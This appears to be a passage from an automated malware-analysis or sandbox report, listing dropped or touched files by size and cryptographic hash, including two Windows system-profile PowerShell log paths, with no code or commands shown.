SHA512cbcecf64126f92844858213e7050942c63cbdf23522e1e8ac0887c655c615239bdf4111475a7ebffa4bf700ec59b6a8125fed46201ff2238eb9d8e4c8e4236c6
-
Filesize
946KB
MD5bee498bb6818e1eec3f96ed8c371e4c3
SHA15cd9f249cb2e4888b6ff488e2b3795ead65460f9
SHA2565dcd18a45f245b8f03ee330afd54014c3dcd6e96b0f9fa0d9b2c98498fd11306
SHA5120821397200c422f1c912a11babb17da7c0fad61ad7fd1e66950fdf80217d87e17b571713b83b66bdbc63996dd01637437296fd186bb205e5665f0965d599bca1
-
Filesize
32KB
MD5ae20c32d0b9e8699756e93f9372972fa
SHA10a80ba47f8175b177ff7f507906e376f0b1a3db3
SHA2565054d87f5429374c958f4ee191993b826be2568307c5b53067c0ee771690591d
SHA512a37cb8de74b593304985d896c1bf86cd6dd144f72d24cd3796308ea04c218c09dc3716a3e66fe3c1455b61a3b8a96e1c942c67ef291e9da15e4a662ac4669f1a
-
Filesize
4.2MB
MD5f7f9ed55e782f4d2d43fb0703dd1273f
SHA18bb98c59bb35055ccf1b52ef12db24cca50b58b0
SHA256ad044817d9a6c1b798001fbf0f769c0ac1d8486afb9dede03543b934be6df3c6
SHA5121126c63648b573b01bcffc1ac037c3ed29074834f1716e54352a1679a4c9d5d393068b22e3820c62e398ab81d127fc242f306e158bf393e58742995df7896ce7
-
Filesize
925KB
MD545445e04eeaaab44456e4296c25ddb1b
SHA175f242422d7329a0a3f9a1230cf694443601717e
SHA25682f77e79a0052160d388738a17a60e3733e439dd6beb53c88232e075ccef7d6e
SHA512ffde7a5727e67998e09cfa90b8db7ac11f17b815a3c846a0a52cf98962049bdb7da94aa0a74f26977a2797309835fd4638c636a6e9412ddc22746fe39af776a6
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2